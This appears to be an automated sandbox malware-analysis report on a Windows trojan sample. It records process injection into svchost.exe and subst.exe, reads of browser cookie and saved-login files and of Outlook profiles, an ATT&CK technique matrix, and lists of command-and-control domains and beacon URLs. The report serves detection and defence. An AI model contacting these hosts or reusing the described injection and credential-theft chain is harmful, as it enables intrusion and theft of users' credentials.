            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\subst.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\subst.exe | Section loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: read write
            Source: C:\Windows\SysWOW64\subst.exe | Section loaded: NULL target: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\subst.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\subst.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\subst.exe | Thread register set: target process: 7948
            Source: C:\Windows\SysWOW64\subst.exe | Thread APC queued: target process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F79008
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001F8C93 LogonUserW
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A3B4C GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A4A35 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00204EF5 mouse_event
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\7RsDGpyOQk.exe"
            Source: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe | Process created: C:\Windows\SysWOW64\subst.exe "C:\Windows\SysWOW64\subst.exe"
            Source: C:\Windows\SysWOW64\subst.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001F81F7 GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00204C03 AllocateAndInitializeSid, CheckTokenMembership, FreeSid
            Source: 7RsDGpyOQk.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 7RsDGpyOQk.exe, UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: UJCHZIamnVz.exe, 00000003.00000000.1891847884.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000003.00000002.4162949347.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, UJCHZIamnVz.exe, 00000007.00000000.2035864523.0000000001830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C886B cpuid
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D50D7 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001E2230 GetUserNameW
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D418A __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A4AFE GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\subst.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\subst.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_81
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_XP
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_XPe
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_VISTA
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_7
            Source: 7RsDGpyOQk.exe | Binary or memory string: WIN_8
            Source: 7RsDGpyOQk.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00216596 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00216A5A socket, WSAGetLastError, bind, WSAGetLastError, closesocket
ATT&CK matrix, flattened from the report's 14-column grid into one line per tactic. A number in parentheses is the signature-count badge printed in that matrix cell, reproduced as printed; techniques without a number are the grid's unmatched placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1466969; sample 7RsDGpyOQk.exe; start date 03/07/2024; architecture WINDOWS; score 100). The graph's legend icons (process, signature, created file, DNS/IP info, dropped, Windows process, counts of created registry values and files, language, malicious, internet) are not reproduced; a number in parentheses after a process name is the count badge printed on that node.

Start
  DNS/IP: www.077551.xyz; www.ajjmamlllqqq.xyz; 21 other IPs or domains
    www.ajjmamlllqqq.xyz: Performs DNS queries to domains with low reputation
  Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 5 other signatures
  started: 7RsDGpyOQk.exe (4)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    started: svchost.exe
      Signature: Maps a DLL or memory area into another process
      injected: UJCHZIamnVz.exe
        Signature: Found direct / indirect Syscall (likely to bypass EDR)
        started: subst.exe (13)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          injected: UJCHZIamnVz.exe
            DNS/IP: www.077551.xyz 104.21.84.69, ports 49754, 49755, 49756, CLOUDFLARENETUS, United States; eoghenluire.com 76.223.105.230, ports 49738, 49739, 49740, AMAZON-02US, United States; 11 other IPs or domains
            Signature: Found direct / indirect Syscall (likely to bypass EDR)
          started: firefox.exe

Source | Detection | Scanner | Label | Link
7RsDGpyOQk.exe | 79% | ReversingLabs | Win32.Trojan.Strab | -
7RsDGpyOQk.exe | 100% | Joe Sandbox ML | - | -
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | -
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | -
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | -
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | -
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | -
https://js.users.51.la/21879113.js | 0% | Avira URL Cloud | safe | -
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | Avira URL Cloud | safe | -
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe | -
http://www.costmoon.com/8g7d/ | 0% | Avira URL Cloud | safe | -
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe | -
http://www.n-ambu.com/2gp2/ | 0% | Avira URL Cloud | safe | -
http://www.n-ambu.com/2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | Avira URL Cloud | safe | -
https://cdn.jqueryscdns.net/jquery-3.7.1.min.js | 0% | Avira URL Cloud | safe | -
http://www.qrdinamicos.com/ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://track.uc.cn/collect | 0% | Avira URL Cloud | safe | -
http://www.114lala.net/ixzv/ | 0% | Avira URL Cloud | safe | -
http://www.dudapolicarpo.online/8pbu/ | 0% | Avira URL Cloud | safe | -
http://push.zhanzhang.baidu.com/push.js | 0% | Avira URL Cloud | safe | -
http://fedoraproject.org/ | 0% | Avira URL Cloud | safe | -
http://nginx.net/ | 0% | Avira URL Cloud | safe | -
http://www.costmoon.com/8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
http://vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI | 0% | Avira URL Cloud | safe | -
http://www.shabygreen.top/4n8t/ | 0% | Avira URL Cloud | safe | -
http://www.immedu.website/p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://hm.baidu.com/hm.js? | 0% | Avira URL Cloud | safe | -
http://www.rodotest2.pro/50i6/ | 0% | Avira URL Cloud | safe | -
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | Avira URL Cloud | safe | -
http://www.vendasnaweb1.com/j5qz/ | 0% | Avira URL Cloud | safe | -
http://www.g2m-os.com/42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | Avira URL Cloud | safe | -
http://www.ajjmamlllqqq.xyz/5uz4/ | 0% | Avira URL Cloud | safe | -
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | Avira URL Cloud | safe | -
http://www.rodotest2.pro | 0% | Avira URL Cloud | safe | -
http://www.shabygreen.top/4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe | -
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe | -
http://www.rodotest2.pro/50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://zz.bdstatic.com/linksubmit/push.js | 0% | Avira URL Cloud | safe | -
http://www.ajjmamlllqqq.xyz/5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
http://www.qrdinamicos.com/ndwb/ | 0% | Avira URL Cloud | safe | -
http://www.dudapolicarpo.online/8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
http://www.eoghenluire.com/i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
http://www.077551.xyz/4ogj/ | 0% | Avira URL Cloud | safe | -
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | 0% | Avira URL Cloud | safe | -
http://www.eoghenluire.com/i3r0/ | 0% | Avira URL Cloud | safe | -
http://www.114lala.net/ixzv/?TvpPfhGp=3oi8oJRBwbk3Fv7B4wkBwCYPdwSnFCWHmnvM7LB8bGn5gZyL3DPz3/FGAD+hTQwo1cQLx9Xf6C04wJsqCrUqebqL9pABwbW+sBk+bBPfLH9pAE6bRw2vg/E=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
http://www.w25dn.top/axxb/ | 0% | Avira URL Cloud | safe | -
http://www.vendasnaweb1.com/j5qz/?TvpPfhGp=wDVhqh7/L6S0ssmI+gpm/LVbhI65FVShh/tgBI/y9RfM7r0s9qzU65mo6yF4gvL+0acj1h9sdpnc2oWt6mPPUzfC6i0Cm604hOcmgozNJQF0xWBsyGELgFo=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
https://f385xw.com/register | 0% | Avira URL Cloud | safe | -
http://www.g2m-os.com/42ua/ | 0% | Avira URL Cloud | safe | -
http://www.w25dn.top/axxb/?TvpPfhGp=Tomi9JcGHwU5W62uuIED6rgr9HvHoI2i1WV2/yOG5tMyELYD9gbQrdSRvly679CAlYQP7KMM3mPFOKjE9n3WDNNFNlS8pk0/g6E2kBMo21yRC+YJoIsNK7I=&Y664G=SttDen986 | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.qrdinamicos.com | 217.160.0.119 | true | false | - | unknown
dudapolicarpo.online | 162.240.81.18 | true | false | - | unknown
www.077551.xyz | 104.21.84.69 | true | true | - | unknown
rodotest2.pro | 3.33.130.190 | true | false | - | unknown
www.114lala.net | 154.23.7.170 | true | false | - | unknown
www.shabygreen.top | 203.161.41.205 | true | false | - | unknown
vendasnaweb1.com | 162.241.2.92 | true | false | - | unknown
www.ajjmamlllqqq.xyz | 35.244.172.47 | true | false | - | unknown
w25dn.top | 38.47.232.185 | true | false | - | unknown
g2m-os.com | 3.33.130.190 | true | false | - | unknown
www.immedu.website | 185.106.178.60 | true | false | - | unknown
www.n-ambu.com | 46.30.211.38 | true | false | - | unknown
www.costmoon.com | 74.208.236.38 | true | false | - | unknown
pixie.porkbun.com | 44.227.65.245 | true | false | - | unknown
eoghenluire.com | 76.223.105.230 | true | true | - | unknown
www.eoghenluire.com | unknown | unknown | true | - | unknown
www.dudapolicarpo.online | unknown | unknown | true | - | unknown
www.voupeclients.com | unknown | unknown | true | - | unknown
www.vendasnaweb1.com | unknown | unknown | true | - | unknown
www.w25dn.top | unknown | unknown | true | - | unknown
www.indotop77.art | unknown | unknown | true | - | unknown
www.rodotest2.pro | unknown | unknown | true | - | unknown
www.g2m-os.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.n-ambu.com/2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.qrdinamicos.com/ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.costmoon.com/8g7d/ | false | Avira URL Cloud: safe | unknown
http://www.n-ambu.com/2gp2/ | false | Avira URL Cloud: safe | unknown
http://www.114lala.net/ixzv/ | false | Avira URL Cloud: safe | unknown
http://www.dudapolicarpo.online/8pbu/ | false | Avira URL Cloud: safe | unknown
http://www.immedu.website/p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.shabygreen.top/4n8t/ | false | Avira URL Cloud: safe | unknown
http://www.costmoon.com/8g7d/?TvpPfhGp=rWbbvp+cwrqQgazA9nOhlKpoIaKdpvX3NtKjwAvzyCJ08CtHZWjUKOIyI7s4v/dodflG0NuedqdGjOxv5Uk5GEd+1aRY1dG/6xJxc0ee/cBS07/9XhY/WVk=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.vendasnaweb1.com/j5qz/ | false | Avira URL Cloud: safe | unknown
http://www.g2m-os.com/42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.rodotest2.pro/50i6/ | false | Avira URL Cloud: safe | unknown
http://www.ajjmamlllqqq.xyz/5uz4/ | false | Avira URL Cloud: safe | unknown
http://www.shabygreen.top/4n8t/?TvpPfhGp=ghFc6znRteN4Ja3nQE93pb+klyhhNrAgC93ynk4+Lc8v1BQxlwgw+LzLUcq3fIz0ommJFFyvB0Z1ghBSVa+hRbhXI8cuWBtdWYqwziEG2BzJAupp88dDv3U=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.ajjmamlllqqq.xyz/5uz4/?TvpPfhGp=dL4clO0CJrDMcIxu4IdYSuD/cDaqSVWvuwN44KEfTTu0on3tmzTjREisTNIHlk2ZlqA7xyFr2WD4XoYfHF4eAi4rK2PJMwuiV4L1panftdceIKli3LKULfU=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.rodotest2.pro/50i6/?TvpPfhGp=qitUcqUffP2yk+NlTcn0cnkOyWQfzTGozjE+fkR+cpfvqRoRQe0JJpYteZO1ejUj8Zcre8jv6/KV+/CxNuPp0r5bf+UIe/RIppbsiuOOAOzLhzD7OHcJ9fs=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.qrdinamicos.com/ndwb/ | false | Avira URL Cloud: safe | unknown
http://www.dudapolicarpo.online/8pbu/?TvpPfhGp=kNNnEV5wtfMTk7EsKDdqofuXk+Rn8vJj2yYB/JV+5cekMazgA8cmAYXSGgFhL+XbvnxEPdo1Vtw1uTcXwhetC6FtU7s9g1m4smEVJIuSZwU+vhX8ycfAGhs=&Y664G=SttDen986 | false | Avira URL Cloud: safe | unknown
http://www.eoghenluire.com/i3r0/?TvpPfhGp=2wwNf3uh0L74coHFwFoEwJLZZncz0eUv2PDbuROkov9Y0f520r30B60Dc6sw70wr8VqsfcnHqRGaEDIOfEcEM+xuD/kdVb8f6u/HqHihPox78cRvPoIrzf8=&Y664G=SttDen986 | true | Avira URL Cloud: safe | unknown
